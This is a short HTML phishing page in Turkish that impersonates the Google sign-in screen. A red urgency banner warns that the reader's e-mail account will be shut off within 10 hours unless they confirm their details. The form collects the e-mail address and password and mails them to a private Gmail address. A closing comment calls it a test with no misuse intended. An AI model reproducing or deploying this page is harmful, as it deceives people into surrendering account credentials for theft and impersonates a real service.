<!DOCTYPE html>
<html>
 <head>
 <title>Google</title>
 <link rel="shortcut icon" href="//www.google.com/favicon.ico"/>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
strong{
    color:red;
   }
fieldset{
    width:350px;
    height:400px;
    border-radius: 10px 10px 10px 10px;
    border: 1px solid rgba(192, 191, 191, 0.637);
     }
  input[type=submit] {
      width:83px;
      height:35px;
      background-color:rgba(9, 90, 240, 0.918);
      color:white;
      border-radius: 6px 6px 6px 6px;
      border: 2px solid rgb(255, 255, 255);
  }  
  input[type=text] {
      width:290px;
      height:33px;
      border-radius: 4px 4px 4px 4px;
      border: 1px solid rgba(160, 158, 158, 0.808);
      
  }
  p#mn{
      color:rgb(87, 82, 82);
      
  }
 strong#ww{
      color:rgb(9, 90, 240,0.918)
  }

</style>
</head>
  <body>
  <center>
  <strong>!!!Teknik aksaklık nedeniyle xxx adlı E-posta iletişiminiz kesilecektir.Kesilmemesi için hesabın size ait olduğunu teyit edebilmemiz için lütfen aşağıdaki bilgileri doldurunuz.!!!<br>KALAN ZAMAN 10SAAT</strong>   
  <form method="get" action="mailto:bgjbh796@gmail.com" >
     <fieldset>
     <!--aşağıda -legend etiketi konunca resim çizginin yarısına gelir-->
     <lege><img src="google.jpg"width=120px; alt=google;><p><font size=5px;>Oturum aç</font></p><p>Google şifrenizi kullanın</p></lege>
      
 <table>
 <tr> <td></td> <td><input type="text" name="subject" placeholder="E-Posta veya telefon" /></td></tr>
 <tr> <td></td> </tr> 
 <tr> <td></td> </tr>
 <tr> <td></td>  
<td><input type="text" name="body" placeholder="E-Posta şifre"/></td> </tr>
 </table>
 <a href="404.html">E-Posta adresini mi unuttunuz?</a><br><br>
 <p id=mn>Bu bilgisayar sizin değil mi? Gizli oturum açmak için Misafir modunu kullanın.<strong id=ww>Daha fazla bilgi</strong></p> 
 <input type="submit" value="İleri"/>
</fieldset>
</form>

</center>
<!--DENEME AMAÇLIDIR HİÇ BİR ŞEKİLDE KÖTÜYE KULLANIM BULUNMAMAKTADIR.ŞÜPESİZ Kİ GOOGLE TEKTİR.-->

 </body> 
</html>